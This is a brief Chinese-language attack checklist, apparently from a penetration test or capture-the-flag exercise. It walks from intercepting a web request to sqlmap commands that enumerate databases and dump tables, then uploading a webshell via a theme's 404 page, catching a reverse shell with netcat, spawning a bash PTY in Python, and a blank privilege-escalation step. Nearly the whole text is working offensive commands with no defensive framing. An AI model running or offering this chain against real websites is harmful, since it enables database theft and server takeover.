1. 设置浏览器代理,拦截网页数据。
2. 复制拦截的raw代码,生成.raw文件
3. 使用sqlmap:
sqlmap -r request.raw -level 5 -risk 3 -dbs -dbms mysql --batch
sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -tables 查看对应数据库中的数据表
sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -T "表名" -columns 查看对应字段 --batch
sqlmap -r request.raw -level 5 -risk 3 -D "数据库名" -T "表名" -C "列名" -dump --batch
4. 网站后台寻找注入点
主题的404页面可以上传webshell
webshell 获取 /user/share/webshell/php/
5. 执行shell 获取反弹shell
监听 nc -nlvp port
启动终端 python -c "import pty;pty.spawn('/bin/bash')"
6.提权